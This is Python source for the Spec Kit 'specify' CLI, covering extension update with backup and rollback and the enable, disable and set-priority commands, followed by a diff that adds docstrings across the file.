# Perform updates with atomic backup/restore
console.print()
updated_extensions = []
failed_updates = []
registrar = CommandRegistrar()
hook_executor = HookExecutor(project_root)
for update in updates_available:
extension_id = update["id"]
ext_name = update["name"] # Use display name for user-facing messages
console.print(f"📦 Updating {ext_name}...")
# Backup paths
backup_base = manager.extensions_dir / ".backup" / f"{extension_id}-update"
backup_ext_dir = backup_base / "extension"
backup_commands_dir = backup_base / "commands"
backup_config_dir = backup_base / "config"
# Store backup state
backup_registry_entry = None
backup_hooks = None # None means no hooks key in config; {} means hooks key existed
backed_up_command_files = {}
try:
# 1. Backup registry entry (always, even if extension dir doesn't exist)
backup_registry_entry = manager.registry.get(extension_id)
# 2. Backup extension directory
extension_dir = manager.extensions_dir / extension_id
if extension_dir.exists():
backup_base.mkdir(parents=True, exist_ok=True)
if backup_ext_dir.exists():
shutil.rmtree(backup_ext_dir)
shutil.copytree(extension_dir, backup_ext_dir)
# Backup config files separately so they can be restored
# after a successful install (install_from_directory clears dest dir).
config_files = list(extension_dir.glob("*-config.yml")) + list(
extension_dir.glob("*-config.local.yml")
)
for cfg_file in config_files:
backup_config_dir.mkdir(parents=True, exist_ok=True)
shutil.copy2(cfg_file, backup_config_dir / cfg_file.name)
# 3. Backup command files for all agents
registered_commands = backup_registry_entry.get("registered_commands", {})
for agent_name, cmd_names in registered_commands.items():
if agent_name not in registrar.AGENT_CONFIGS:
continue
agent_config = registrar.AGENT_CONFIGS[agent_name]
commands_dir = project_root / agent_config["dir"]
for cmd_name in cmd_names:
cmd_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
if cmd_file.exists():
backup_cmd_path = backup_commands_dir / agent_name / cmd_file.name
backup_cmd_path.parent.mkdir(parents=True, exist_ok=True)
shutil.copy2(cmd_file, backup_cmd_path)
backed_up_command_files[str(cmd_file)] = str(backup_cmd_path)
# Also backup copilot prompt files
if agent_name == "copilot":
prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
if prompt_file.exists():
backup_prompt_path = backup_commands_dir / "copilot-prompts" / prompt_file.name
backup_prompt_path.parent.mkdir(parents=True, exist_ok=True)
shutil.copy2(prompt_file, backup_prompt_path)
backed_up_command_files[str(prompt_file)] = str(backup_prompt_path)
# 4. Backup hooks from extensions.yml
# Use backup_hooks=None to indicate config had no "hooks" key (don't create on restore)
# Use backup_hooks={} to indicate config had "hooks" key with no hooks for this extension
config = hook_executor.get_project_config()
if "hooks" in config:
backup_hooks = {} # Config has hooks key - preserve this fact
for hook_name, hook_list in config["hooks"].items():
ext_hooks = [h for h in hook_list if h.get("extension") == extension_id]
if ext_hooks:
backup_hooks[hook_name] = ext_hooks
# 5. Download new version
zip_path = catalog.download_extension(extension_id)
try:
# 6. Validate extension ID from ZIP BEFORE modifying installation
# Handle both root-level and nested extension.yml (GitHub auto-generated ZIPs)
with zipfile.ZipFile(zip_path, "r") as zf:
import yaml
manifest_data = None
namelist = zf.namelist()
# First try root-level extension.yml
if "extension.yml" in namelist:
with zf.open("extension.yml") as f:
manifest_data = yaml.safe_load(f) or {}
else:
# Look for extension.yml in a single top-level subdirectory
# (e.g., "repo-name-branch/extension.yml")
manifest_paths = [n for n in namelist if n.endswith("/extension.yml") and n.count("/") == 1]
if len(manifest_paths) == 1:
with zf.open(manifest_paths[0]) as f:
manifest_data = yaml.safe_load(f) or {}
if manifest_data is None:
raise ValueError("Downloaded extension archive is missing 'extension.yml'")
zip_extension_id = manifest_data.get("extension", {}).get("id")
if zip_extension_id != extension_id:
raise ValueError(
f"Extension ID mismatch: expected '{extension_id}', got '{zip_extension_id}'"
)
# 7. Remove old extension (handles command file cleanup and registry removal)
manager.remove(extension_id, keep_config=True)
# 8. Install new version
_ = manager.install_from_zip(zip_path, speckit_version)
# Restore user config files from backup after successful install.
new_extension_dir = manager.extensions_dir / extension_id
if backup_config_dir.exists() and new_extension_dir.exists():
for cfg_file in backup_config_dir.iterdir():
if cfg_file.is_file():
shutil.copy2(cfg_file, new_extension_dir / cfg_file.name)
# 9. Restore metadata from backup (installed_at, enabled state)
if backup_registry_entry and isinstance(backup_registry_entry, dict):
# Copy current registry entry to avoid mutating internal
# registry state before explicit restore().
current_metadata = manager.registry.get(extension_id)
if current_metadata is None or not isinstance(current_metadata, dict):
raise RuntimeError(
f"Registry entry for '{extension_id}' missing or corrupted after install — update incomplete"
)
new_metadata = dict(current_metadata)
# Preserve the original installation timestamp
if "installed_at" in backup_registry_entry:
new_metadata["installed_at"] = backup_registry_entry["installed_at"]
# Preserve the original priority (normalized to handle corruption)
if "priority" in backup_registry_entry:
new_metadata["priority"] = normalize_priority(backup_registry_entry["priority"])
# If extension was disabled before update, disable it again
if not backup_registry_entry.get("enabled", True):
new_metadata["enabled"] = False
# Use restore() instead of update() because update() always
# preserves the existing installed_at, ignoring our override
manager.registry.restore(extension_id, new_metadata)
# Also disable hooks in extensions.yml if extension was disabled
if not backup_registry_entry.get("enabled", True):
config = hook_executor.get_project_config()
if "hooks" in config:
for hook_name in config["hooks"]:
for hook in config["hooks"][hook_name]:
if hook.get("extension") == extension_id:
hook["enabled"] = False
hook_executor.save_project_config(config)
finally:
# Clean up downloaded ZIP
if zip_path.exists():
zip_path.unlink()
# 10. Clean up backup on success
if backup_base.exists():
shutil.rmtree(backup_base)
console.print(f" [green]✓[/green] Updated to v{update['available']}")
updated_extensions.append(ext_name)
except KeyboardInterrupt:
raise
except Exception as e:
console.print(f" [red]✗[/red] Failed: {e}")
failed_updates.append((ext_name, str(e)))
# Rollback on failure
console.print(f" [yellow]↩[/yellow] Rolling back {ext_name}...")
try:
# Restore extension directory
# Only perform destructive rollback if backup exists (meaning we
# actually modified the extension). This avoids deleting a valid
# installation when failure happened before changes were made.
extension_dir = manager.extensions_dir / extension_id
if backup_ext_dir.exists():
if extension_dir.exists():
shutil.rmtree(extension_dir)
shutil.copytree(backup_ext_dir, extension_dir)
# Remove any NEW command files created by failed install
# (files that weren't in the original backup)
try:
new_registry_entry = manager.registry.get(extension_id)
if new_registry_entry is None or not isinstance(new_registry_entry, dict):
new_registered_commands = {}
else:
new_registered_commands = new_registry_entry.get("registered_commands", {})
for agent_name, cmd_names in new_registered_commands.items():
if agent_name not in registrar.AGENT_CONFIGS:
continue
agent_config = registrar.AGENT_CONFIGS[agent_name]
commands_dir = project_root / agent_config["dir"]
for cmd_name in cmd_names:
cmd_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
# Delete if it exists and wasn't in our backup
if cmd_file.exists() and str(cmd_file) not in backed_up_command_files:
cmd_file.unlink()
# Also handle copilot prompt files
if agent_name == "copilot":
prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
if prompt_file.exists() and str(prompt_file) not in backed_up_command_files:
prompt_file.unlink()
except KeyError:
pass # No new registry entry exists, nothing to clean up
# Restore backed up command files
for original_path, backup_path in backed_up_command_files.items():
backup_file = Path(backup_path)
if backup_file.exists():
original_file = Path(original_path)
original_file.parent.mkdir(parents=True, exist_ok=True)
shutil.copy2(backup_file, original_file)
# Restore hooks in extensions.yml
# - backup_hooks=None means original config had no "hooks" key
# - backup_hooks={} or {...} means config had hooks key
config = hook_executor.get_project_config()
if "hooks" in config:
modified = False
if backup_hooks is None:
# Original config had no "hooks" key; remove it entirely
del config["hooks"]
modified = True
else:
# Remove any hooks for this extension added by failed install
for hook_name, hooks_list in config["hooks"].items():
original_len = len(hooks_list)
config["hooks"][hook_name] = [
h for h in hooks_list
if h.get("extension") != extension_id
]
if len(config["hooks"][hook_name]) != original_len:
modified = True
# Add back the backed up hooks if any
if backup_hooks:
for hook_name, hooks in backup_hooks.items():
if hook_name not in config["hooks"]:
config["hooks"][hook_name] = []
config["hooks"][hook_name].extend(hooks)
modified = True
if modified:
hook_executor.save_project_config(config)
# Restore registry entry (use restore() since entry was removed)
if backup_registry_entry:
manager.registry.restore(extension_id, backup_registry_entry)
console.print(" [green]✓[/green] Rollback successful")
# Clean up backup directory only on successful rollback
if backup_base.exists():
shutil.rmtree(backup_base)
except Exception as rollback_error:
console.print(f" [red]✗[/red] Rollback failed: {rollback_error}")
console.print(f" [dim]Backup preserved at: {backup_base}[/dim]")
# Summary
console.print()
if updated_extensions:
console.print(f"[green]✓[/green] Successfully updated {len(updated_extensions)} extension(s)")
if failed_updates:
console.print(f"[red]✗[/red] Failed to update {len(failed_updates)} extension(s):")
for ext_name, error in failed_updates:
console.print(f" • {ext_name}: {error}")
raise typer.Exit(1)
except ValidationError as e:
console.print(f"\n[red]Validation Error:[/red] {e}")
raise typer.Exit(1)
except ExtensionError as e:
console.print(f"\n[red]Error:[/red] {e}")
raise typer.Exit(1)
@extension_app.command("enable")
def extension_enable(
extension: str = typer.Argument(help="Extension ID or name to enable"),
):
from .extensions import ExtensionManager, HookExecutor
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = ExtensionManager(project_root)
hook_executor = HookExecutor(project_root)
# Resolve extension ID from argument (handles ambiguous names)
installed = manager.list_installed()
extension_id, display_name = _resolve_installed_extension(extension, installed, "enable")
# Update registry
metadata = manager.registry.get(extension_id)
if metadata is None or not isinstance(metadata, dict):
console.print(f"[red]Error:[/red] Extension '{extension_id}' not found in registry (corrupted state)")
raise typer.Exit(1)
if metadata.get("enabled", True):
console.print(f"[yellow]Extension '{display_name}' is already enabled[/yellow]")
raise typer.Exit(0)
metadata["enabled"] = True
manager.registry.update(extension_id, metadata)
# Enable hooks in extensions.yml
config = hook_executor.get_project_config()
if "hooks" in config:
for hook_name in config["hooks"]:
for hook in config["hooks"][hook_name]:
if hook.get("extension") == extension_id:
hook["enabled"] = True
hook_executor.save_project_config(config)
console.print(f"[green]✓[/green] Extension '{display_name}' enabled")
@extension_app.command("disable")
def extension_disable(
extension: str = typer.Argument(help="Extension ID or name to disable"),
):
from .extensions import ExtensionManager, HookExecutor
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = ExtensionManager(project_root)
hook_executor = HookExecutor(project_root)
# Resolve extension ID from argument (handles ambiguous names)
installed = manager.list_installed()
extension_id, display_name = _resolve_installed_extension(extension, installed, "disable")
# Update registry
metadata = manager.registry.get(extension_id)
if metadata is None or not isinstance(metadata, dict):
console.print(f"[red]Error:[/red] Extension '{extension_id}' not found in registry (corrupted state)")
raise typer.Exit(1)
if not metadata.get("enabled", True):
console.print(f"[yellow]Extension '{display_name}' is already disabled[/yellow]")
raise typer.Exit(0)
metadata["enabled"] = False
manager.registry.update(extension_id, metadata)
# Disable hooks in extensions.yml
config = hook_executor.get_project_config()
if "hooks" in config:
for hook_name in config["hooks"]:
for hook in config["hooks"][hook_name]:
if hook.get("extension") == extension_id:
hook["enabled"] = False
hook_executor.save_project_config(config)
console.print(f"[green]✓[/green] Extension '{display_name}' disabled")
console.print("\nCommands will no longer be available. Hooks will not execute.")
console.print(f"To re-enable: specify extension enable {extension_id}")
@extension_app.command("set-priority")
def extension_set_priority(
extension: str = typer.Argument(help="Extension ID or name"),
priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
from .extensions import ExtensionManager
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Validate priority
if priority < 1:
console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
raise typer.Exit(1)
manager = ExtensionManager(project_root)
# Resolve extension ID from argument (handles ambiguous names)
installed = manager.list_installed()
extension_id, display_name = _resolve_installed_extension(extension, installed, "set-priority")
# Get current metadata
metadata = manager.registry.get(extension_id)
if metadata is None or not isinstance(metadata, dict):
console.print(f"[red]Error:[/red] Extension '{extension_id}' not found in registry (corrupted state)")
raise typer.Exit(1)
from .extensions import normalize_priority
raw_priority = metadata.get("priority")
# Only skip if the stored value is already a valid int equal to requested priority
# This ensures corrupted values (e.g., "high") get repaired even when setting to default (10)
if isinstance(raw_priority, int) and raw_priority == priority:
console.print(f"[yellow]Extension '{display_name}' already has priority {priority}[/yellow]")
raise typer.Exit(0)
old_priority = normalize_priority(raw_priority)
# Update priority
manager.registry.update(extension_id, {"priority": priority})
console.print(f"[green]✓[/green] Extension '{display_name}' priority changed: {old_priority} → {priority}")
console.print("\n[dim]Lower priority = higher precedence in template resolution[/dim]")
def main():
app()
if __name__ == "__main__":
main() | --- +++ @@ -10,6 +10,20 @@ # "json5",
# ]
# ///
+"""
+Specify CLI - Setup tool for Specify projects
+
+Usage:
+ uvx specify-cli.py init <project-name>
+ uvx specify-cli.py init .
+ uvx specify-cli.py init --here
+
+Or install globally:
+ uv tool install --from specify-cli.py specify-cli
+ specify init <project-name>
+ specify init .
+ specify init --here
+"""
import os
import subprocess
@@ -47,13 +61,16 @@ client = httpx.Client(verify=ssl_context)
def _github_token(cli_token: str | None = None) -> str | None:
+ """Return sanitized GitHub token (cli arg takes precedence) or None."""
return ((cli_token or os.getenv("GH_TOKEN") or os.getenv("GITHUB_TOKEN") or "").strip()) or None
def _github_auth_headers(cli_token: str | None = None) -> dict:
+ """Return Authorization header dict only when a non-empty token exists."""
token = _github_token(cli_token)
return {"Authorization": f"Bearer {token}"} if token else {}
def _parse_rate_limit_headers(headers: httpx.Headers) -> dict:
+ """Extract and parse GitHub rate-limit headers."""
info = {}
# Standard GitHub rate-limit headers
@@ -81,6 +98,7 @@ return info
def _format_rate_limit_error(status_code: int, headers: httpx.Headers, url: str) -> str:
+ """Format a user-friendly error message with rate-limit information."""
rate_info = _parse_rate_limit_headers(headers)
lines = [f"GitHub API returned status {status_code} for {url}"]
@@ -285,6 +303,7 @@ }
def _build_ai_assistant_help() -> str:
+ """Build the --ai help text from AGENT_CONFIG so it stays in sync with runtime config."""
non_generic_agents = sorted(agent for agent in AGENT_CONFIG if agent != "generic")
base_help = (
@@ -322,6 +341,9 @@
TAGLINE = "GitHub Spec Kit - Spec-Driven Development Toolkit"
class StepTracker:
+ """Track and render hierarchical steps without emojis, similar to Claude Code tree output.
+ Supports live auto-refresh via an attached refresh callback.
+ """
def __init__(self, title: str):
self.title = title
self.steps = [] # list of dicts: {key, label, status, detail}
@@ -404,6 +426,7 @@ return tree
def get_key():
+ """Get a single keypress in a cross-platform way using readchar."""
key = readchar.readkey()
if key == readchar.key.UP or key == readchar.key.CTRL_P:
@@ -423,6 +446,17 @@ return key
def select_with_arrows(options: dict, prompt_text: str = "Select an option", default_key: str = None) -> str:
+ """
+ Interactive selection using arrow keys with Rich Live display.
+
+ Args:
+ options: Dict with keys as option keys and values as descriptions
+ prompt_text: Text to show above the options
+ default_key: Default option key to start with
+
+ Returns:
+ Selected option key
+ """
option_keys = list(options.keys())
if default_key and default_key in option_keys:
selected_index = option_keys.index(default_key)
@@ -432,6 +466,7 @@ selected_key = None
def create_selection_panel():
+ """Create the selection panel with current selection highlighted."""
table = Table.grid(padding=(0, 2))
table.add_column(style="cyan", justify="left", width=3)
table.add_column(style="white", justify="left")
@@ -488,6 +523,7 @@ console = Console()
class BannerGroup(TyperGroup):
+ """Custom group that shows banner before help."""
def format_help(self, ctx, formatter):
# Show banner before help
@@ -504,6 +540,7 @@ )
def show_banner():
+ """Display the ASCII art banner."""
banner_lines = BANNER.strip().split('\n')
colors = ["bright_blue", "blue", "cyan", "bright_cyan", "white", "bright_white"]
@@ -518,12 +555,14 @@
@app.callback()
def callback(ctx: typer.Context):
+ """Show banner when no subcommand is provided."""
if ctx.invoked_subcommand is None and "--help" not in sys.argv and "-h" not in sys.argv:
show_banner()
console.print(Align.center("[dim]Run 'specify --help' for usage information[/dim]"))
console.print()
def run_command(cmd: list[str], check_return: bool = True, capture: bool = False, shell: bool = False) -> Optional[str]:
+ """Run a shell command and optionally capture output."""
try:
if capture:
result = subprocess.run(cmd, check=check_return, capture_output=True, text=True, shell=shell)
@@ -541,6 +580,15 @@ return None
def check_tool(tool: str, tracker: StepTracker = None) -> bool:
+ """Check if a tool is installed. Optionally update tracker.
+
+ Args:
+ tool: Name of the tool to check
+ tracker: Optional StepTracker to update with results
+
+ Returns:
+ True if tool is found, False otherwise
+ """
# Special handling for Claude CLI after `claude migrate-installer`
# See: https://github.com/github/spec-kit/issues/123
# The migrate-installer command REMOVES the original executable from PATH
@@ -568,6 +616,7 @@ return found
def is_git_repo(path: Path = None) -> bool:
+ """Check if the specified path is inside a git repository."""
if path is None:
path = Path.cwd()
@@ -587,6 +636,15 @@ return False
def init_git_repo(project_path: Path, quiet: bool = False) -> Tuple[bool, Optional[str]]:
+ """Initialize a git repository in the specified path.
+
+ Args:
+ project_path: Path to initialize git repository in
+ quiet: if True suppress console output (tracker handles status)
+
+ Returns:
+ Tuple of (success: bool, error_message: Optional[str])
+ """
try:
original_cwd = Path.cwd()
os.chdir(project_path)
@@ -613,11 +671,17 @@ os.chdir(original_cwd)
def handle_vscode_settings(sub_item, dest_file, rel_path, verbose=False, tracker=None) -> None:
+ """Handle merging or copying of .vscode/settings.json files.
+
+ Note: when merge produces changes, rewritten output is normalized JSON and
+ existing JSONC comments/trailing commas are not preserved.
+ """
def log(message, color="green"):
if verbose and not tracker:
console.print(f"[{color}]{message}[/] {rel_path}")
def atomic_write_json(target_file: Path, payload: dict[str, Any]) -> None:
+ """Atomically write JSON while preserving existing mode bits when possible."""
temp_path: Optional[Path] = None
try:
with tempfile.NamedTemporaryFile(
@@ -676,6 +740,22 @@
def merge_json_files(existing_path: Path, new_content: Any, verbose: bool = False) -> Optional[dict[str, Any]]:
+ """Merge new JSON content into existing JSON file.
+
+ Performs a polite deep merge where:
+ - New keys are added
+ - Existing keys are preserved (not overwritten) unless both values are dictionaries
+ - Nested dictionaries are merged recursively only when both sides are dictionaries
+ - Lists and other values are preserved from base if they exist
+
+ Args:
+ existing_path: Path to existing JSON file
+ new_content: New JSON content to merge in
+ verbose: Whether to print merge details
+
+ Returns:
+ Merged JSON content as dict, or None if the existing file should be left untouched.
+ """
# Load existing content first to have a safe fallback
existing_content = None
exists = existing_path.exists()
@@ -711,6 +791,7 @@ return None
def deep_merge_polite(base: dict[str, Any], update: dict[str, Any]) -> dict[str, Any]:
+ """Recursively merge update dict into base dict, preserving base values."""
result = base.copy()
for key, value in update.items():
if key not in result:
@@ -852,6 +933,9 @@ return zip_path, metadata
def download_and_extract_template(project_path: Path, ai_assistant: str, script_type: str, is_current_dir: bool = False, *, verbose: bool = True, tracker: StepTracker | None = None, client: httpx.Client = None, debug: bool = False, github_token: str = None) -> Path:
+ """Download the latest release and extract it to create a new project.
+ Returns project_path. Uses tracker if provided (with keys: fetch, download, extract, cleanup)
+ """
current_dir = Path.cwd()
if tracker:
@@ -999,6 +1083,7 @@
def ensure_executable_scripts(project_path: Path, tracker: StepTracker | None = None) -> None:
+ """Ensure POSIX .sh scripts under .specify/scripts (recursively) have execute bits (no-op on Windows)."""
if os.name == "nt":
return # Windows: skip silently
scripts_root = project_path / ".specify" / "scripts"
@@ -1046,6 +1131,7 @@ console.print(f" - {f}")
def ensure_constitution_from_template(project_path: Path, tracker: StepTracker | None = None) -> None:
+ """Copy constitution template to memory if it doesn't exist (preserves existing constitution on reinitialization)."""
memory_constitution = project_path / ".specify" / "memory" / "constitution.md"
template_constitution = project_path / ".specify" / "templates" / "constitution-template.md"
@@ -1084,12 +1170,22 @@
def save_init_options(project_path: Path, options: dict[str, Any]) -> None:
+ """Persist the CLI options used during ``specify init``.
+
+ Writes a small JSON file to ``.specify/init-options.json`` so that
+ later operations (e.g. preset install) can adapt their behaviour
+ without scanning the filesystem.
+ """
dest = project_path / INIT_OPTIONS_FILE
dest.parent.mkdir(parents=True, exist_ok=True)
dest.write_text(json.dumps(options, indent=2, sort_keys=True))
def load_init_options(project_path: Path) -> dict[str, Any]:
+ """Load the init options previously saved by ``specify init``.
+
+ Returns an empty dict if the file does not exist or cannot be parsed.
+ """
path = project_path / INIT_OPTIONS_FILE
if not path.exists():
return {}
@@ -1123,6 +1219,12 @@
def _get_skills_dir(project_path: Path, selected_ai: str) -> Path:
+ """Resolve the agent-specific skills directory for the given AI assistant.
+
+ Uses ``AGENT_SKILLS_DIR_OVERRIDES`` first, then falls back to
+ ``AGENT_CONFIG[agent]["folder"] + "skills"``, and finally to
+ ``DEFAULT_SKILLS_DIR``.
+ """
if selected_ai in AGENT_SKILLS_DIR_OVERRIDES:
return project_path / AGENT_SKILLS_DIR_OVERRIDES[selected_ai]
@@ -1135,6 +1237,22 @@
def install_ai_skills(project_path: Path, selected_ai: str, tracker: StepTracker | None = None) -> bool:
+ """Install Prompt.MD files from templates/commands/ as agent skills.
+
+ Skills are written to the agent-specific skills directory following the
+ `agentskills.io <https://agentskills.io/specification>`_ specification.
+ Installation is additive — existing files are never removed and prompt
+ command files in the agent's commands directory are left untouched.
+
+ Args:
+ project_path: Target project directory.
+ selected_ai: AI assistant key from ``AGENT_CONFIG``.
+ tracker: Optional progress tracker.
+
+ Returns:
+ ``True`` if at least one skill was installed or all skills were
+ already present (idempotent re-run), ``False`` otherwise.
+ """
# Locate command templates in the agent's extracted commands directory.
# download_and_extract_template() already placed the .md files here.
agent_config = AGENT_CONFIG.get(selected_ai, {})
@@ -1292,6 +1410,16 @@
def _handle_agy_deprecation(console: Console) -> None:
+ """
+ Print the deprecation error for the Antigravity (agy) agent and exit.
+
+ Context for future AI reviewers (e.g., GitHub Copilot):
+ - Prior to Antigravity v1.20.5, users could rely on explicit agent command definitions generated by this tool.
+ - v1.20.5 removed this "command support" in favor of "Agent Skills".
+ - `specify_cli` handles this by throwing a fail-fast deprecation error if `--ai agy` is
+ invoked without the accompanying `--ai-skills` flag. Users are instructed to add
+ the skills flag to generate agent skills templates instead.
+ """
console.print("\n[red]Error:[/red] Explicit command support was deprecated in Antigravity version 1.20.5.")
console.print("Please use [cyan]--ai-skills[/cyan] when initializing to install templates as agent skills instead.")
console.print("[yellow]Usage:[/yellow] specify init <project> --ai agy --ai-skills")
@@ -1313,6 +1441,35 @@ ai_skills: bool = typer.Option(False, "--ai-skills", help="Install Prompt.MD templates as agent skills (requires --ai)"),
preset: str = typer.Option(None, "--preset", help="Install a preset during initialization (by preset ID)"),
):
+ """
+ Initialize a new Specify project from the latest template.
+
+ This command will:
+ 1. Check that required tools are installed (git is optional)
+ 2. Let you choose your AI assistant
+ 3. Download the appropriate template from GitHub
+ 4. Extract the template to a new project directory or current directory
+ 5. Initialize a fresh git repository (if not --no-git and no existing repo)
+ 6. Optionally set up AI assistant commands
+
+ Examples:
+ specify init my-project
+ specify init my-project --ai claude
+ specify init my-project --ai copilot --no-git
+ specify init --ignore-agent-tools my-project
+ specify init . --ai claude # Initialize in current directory
+ specify init . # Initialize in current directory (interactive AI selection)
+ specify init --here --ai claude # Alternative syntax for current directory
+ specify init --here --ai codex
+ specify init --here --ai codebuddy
+ specify init --here --ai vibe # Initialize with Mistral Vibe support
+ specify init --here
+ specify init --here --force # Skip confirmation when current directory not empty
+ specify init my-project --ai claude --ai-skills # Install agent skills
+ specify init --here --ai gemini --ai-skills
+ specify init my-project --ai generic --ai-commands-dir .myagent/commands/ # Unsupported agent
+ specify init my-project --ai claude --preset healthcare-compliance # With preset
+ """
show_banner()
@@ -1716,6 +1873,7 @@
@app.command()
def check():
+ """Check that all required tools are installed."""
show_banner()
console.print("[bold]Checking for installed tools...[/bold]\n")
@@ -1759,6 +1917,7 @@
@app.command()
def version():
+ """Display version and system information."""
import platform
import importlib.metadata
@@ -1868,6 +2027,7 @@
def get_speckit_version() -> str:
+ """Get current spec-kit version."""
import importlib.metadata
try:
return importlib.metadata.version("specify-cli")
@@ -1892,6 +2052,7 @@
@preset_app.command("list")
def preset_list():
+ """List installed presets."""
from .presets import PresetManager
project_root = Path.cwd()
@@ -1931,6 +2092,7 @@ dev: str = typer.Option(None, "--dev", help="Install from local directory (development mode)"),
priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
+ """Install a preset."""
from .presets import (
PresetManager,
PresetCatalog,
@@ -2035,6 +2197,7 @@ def preset_remove(
pack_id: str = typer.Argument(..., help="Preset ID to remove"),
):
+ """Remove an installed preset."""
from .presets import PresetManager
project_root = Path.cwd()
@@ -2064,6 +2227,7 @@ tag: str = typer.Option(None, "--tag", help="Filter by tag"),
author: str = typer.Option(None, "--author", help="Filter by author"),
):
+ """Search for presets in the catalog."""
from .presets import PresetCatalog, PresetError
project_root = Path.cwd()
@@ -2100,6 +2264,7 @@ def preset_resolve(
template_name: str = typer.Argument(..., help="Template name to resolve (e.g., spec-template)"),
):
+ """Show which template will be resolved for a given name."""
from .presets import PresetResolver
project_root = Path.cwd()
@@ -2125,6 +2290,7 @@ def preset_info(
pack_id: str = typer.Argument(..., help="Preset ID to get info about"),
):
+ """Show detailed information about a preset."""
from .extensions import normalize_priority
from .presets import PresetCatalog, PresetManager, PresetError
@@ -2199,6 +2365,7 @@ pack_id: str = typer.Argument(help="Preset ID"),
priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
+ """Set the resolution priority of an installed preset."""
from .presets import PresetManager
project_root = Path.cwd()
@@ -2250,6 +2417,7 @@
@preset_catalog_app.command("list")
def preset_catalog_list():
+ """List all active preset catalogs."""
from .presets import PresetCatalog, PresetValidationError
project_root = Path.cwd()
@@ -2318,6 +2486,7 @@ ),
description: str = typer.Option("", "--description", help="Description of the catalog"),
):
+ """Add a catalog to .specify/preset-catalogs.yml."""
from .presets import PresetCatalog, PresetValidationError
project_root = Path.cwd()
@@ -2382,6 +2551,7 @@ def preset_catalog_remove(
name: str = typer.Argument(help="Catalog name to remove"),
):
+ """Remove a catalog from .specify/preset-catalogs.yml."""
project_root = Path.cwd()
specify_dir = project_root / ".specify"
@@ -2429,6 +2599,20 @@ command_name: str = "command",
allow_not_found: bool = False,
) -> tuple[Optional[str], Optional[str]]:
+ """Resolve an extension argument (ID or display name) to an installed extension.
+
+ Args:
+ argument: Extension ID or display name provided by user
+ installed_extensions: List of installed extension dicts from manager.list_installed()
+ command_name: Name of the command for error messages (e.g., "enable", "disable")
+ allow_not_found: If True, return (None, None) when not found instead of raising
+
+ Returns:
+ Tuple of (extension_id, display_name), or (None, None) if allow_not_found=True and not found
+
+ Raises:
+ typer.Exit: If extension not found (and allow_not_found=False) or name is ambiguous
+ """
from rich.table import Table
# First, try exact ID match
@@ -2471,6 +2655,19 @@ catalog,
command_name: str = "info",
) -> tuple[Optional[dict], Optional[Exception]]:
+ """Resolve an extension argument (ID or display name) from the catalog.
+
+ Args:
+ argument: Extension ID or display name provided by user
+ catalog: ExtensionCatalog instance
+ command_name: Name of the command for error messages
+
+ Returns:
+ Tuple of (extension_info, catalog_error)
+ - If found: (ext_info_dict, None)
+ - If catalog error: (None, error)
+ - If not found: (None, None)
+ """
from rich.table import Table
from .extensions import ExtensionError
@@ -2521,6 +2718,7 @@ available: bool = typer.Option(False, "--available", help="Show available extensions from catalog"),
all_extensions: bool = typer.Option(False, "--all", help="Show both installed and available"),
):
+ """List installed extensions."""
from .extensions import ExtensionManager
project_root = Path.cwd()
@@ -2561,6 +2759,7 @@
@catalog_app.command("list")
def catalog_list():
+ """List all active extension catalogs."""
from .extensions import ExtensionCatalog, ValidationError
project_root = Path.cwd()
@@ -2629,6 +2828,7 @@ ),
description: str = typer.Option("", "--description", help="Description of the catalog"),
):
+ """Add a catalog to .specify/extension-catalogs.yml."""
from .extensions import ExtensionCatalog, ValidationError
project_root = Path.cwd()
@@ -2693,6 +2893,7 @@ def catalog_remove(
name: str = typer.Argument(help="Catalog name to remove"),
):
+ """Remove a catalog from .specify/extension-catalogs.yml."""
project_root = Path.cwd()
specify_dir = project_root / ".specify"
@@ -2738,6 +2939,7 @@ from_url: Optional[str] = typer.Option(None, "--from", help="Install from custom URL"),
priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
+ """Install an extension."""
from .extensions import ExtensionManager, ExtensionCatalog, ExtensionError, ValidationError, CompatibilityError
project_root = Path.cwd()
@@ -2880,6 +3082,7 @@ keep_config: bool = typer.Option(False, "--keep-config", help="Don't remove config files"),
force: bool = typer.Option(False, "--force", help="Skip confirmation"),
):
+ """Uninstall an extension."""
from .extensions import ExtensionManager
project_root = Path.cwd()
@@ -2937,6 +3140,7 @@ author: Optional[str] = typer.Option(None, "--author", help="Filter by author"),
verified: bool = typer.Option(False, "--verified", help="Show only verified extensions"),
):
+ """Search for available extensions in catalog."""
from .extensions import ExtensionCatalog, ExtensionError
project_root = Path.cwd()
@@ -3020,6 +3224,7 @@ def extension_info(
extension: str = typer.Argument(help="Extension ID or name"),
):
+ """Show detailed information about an extension."""
from .extensions import ExtensionCatalog, ExtensionManager, normalize_priority
project_root = Path.cwd()
@@ -3109,6 +3314,7 @@
def _print_extension_info(ext_info: dict, manager):
+ """Print formatted extension info from catalog data."""
from .extensions import normalize_priority
# Header
@@ -3210,6 +3416,7 @@ def extension_update(
extension: str = typer.Argument(None, help="Extension ID or name to update (or all)"),
):
+ """Update extension(s) to latest version."""
from .extensions import (
ExtensionManager,
ExtensionCatalog,
@@ -3612,6 +3819,7 @@ def extension_enable(
extension: str = typer.Argument(help="Extension ID or name to enable"),
):
+ """Enable a disabled extension."""
from .extensions import ExtensionManager, HookExecutor
project_root = Path.cwd()
@@ -3659,6 +3867,7 @@ def extension_disable(
